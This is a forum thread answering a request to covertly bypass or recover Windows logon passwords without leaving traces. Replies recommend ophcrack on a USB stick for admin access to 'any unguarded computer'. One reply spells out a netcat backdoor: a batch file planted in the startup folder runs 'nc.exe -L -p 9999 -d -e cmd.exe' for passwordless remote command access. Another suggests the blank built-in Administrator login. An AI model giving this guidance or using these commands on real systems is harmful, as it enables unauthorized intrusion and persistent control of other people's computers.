Hey, I was wondering if there was a way to either find out the password in windows, or just bypass the logon screen, without making a blank password, or changing any settings, just doing it stealth style. Is there a way?
Hi there! (first post here :mean: ) I just done this recently... All you got to do is use ophcrack (just google it) it is a linux based live bootable CD - It works great. What I also did was follow instructions from http://www.pendrivelinux.com/2007/06/12/creating-a-bootable-usb-ophcrack/ to get it working from a USB flash drive, you'll need at least 512MB I used a gig. The instructions are fairly simply - but they did neglect to say the need to de-compress the ophcrack live cd ISO file.. just use 7-zip or similar. Have fun! - now I have a flash drive on my key ring which will give me administrator access to any unguarded computer (running windows) :pleased:
Do you want to do it remotely? Cuz ophcrack will get you the password hashes only locally on the system its running on. Remember, once you get the hash remotely it saves it as "NTLM session security" hash, locally it saves it "LM & NTLM" hash, as soon as it is "NTLM Session Security" Ophcrack and rainbowcrack cannot crack it because they use an attack called "cryptanalysis attack" which uses pre generated tables to crack the password in seconds and they can only crack "LM", "LMchall", HALFLMChall", "NTLM", "NTLMChall", "FASTLM", MSCACHE, MD2, MD4, MD5, SHA1, RipeMD 160, MySQL 323, MySQLsha1, CISCOPIX, SHA256, SHA384, SHA512, Oracle, and with the right tool WPA-PSK. So if you do it remotely you will have to use a wordlist or bruteforce to crack the password. You can always read up on netcat and then write a nice batchfile to get you access without needing any user or pass. The batchfile will copy netcat from your computer to the target computer once the target computer executes the batchfile, then it copies a batchfile to the target computer's startup folder which in turn then executes this command with netcat the everytime the target starts up: nc.exe -L -p 9999 -d -e cmd.exe so now the moment you telnet to port 9999 on the target computer you will have full rights on there without ever needed a password. But the netcat trick only works if the target computer is on your local network.
check out the page on this forum under ethical hacking then go to PLEASE REPLY and look at my post it should help you
As far as I know , there are two main methods to solve the windows password problem as follows: 1st Method: Start system and when you see Windows Welcome screen / Login screen, press [ctrl]+[alt]+[del] keys twice and it'll show Classic Login box. Now type \"Administrator\" (without quotes) in Username and leave Password field blank. Now press Enter and you should be able to log in Windows. Now you can reset your account password from \"Control Panel -> User Accounts\". Same thing can be done using Safe Mode. In Safe Mode Windows will show this in-built Administrator account in Login screen. 2th Method: Windows password reset software: for example:Windows Password Reset 6.0. Comparatively, It is more easy and convenient to use.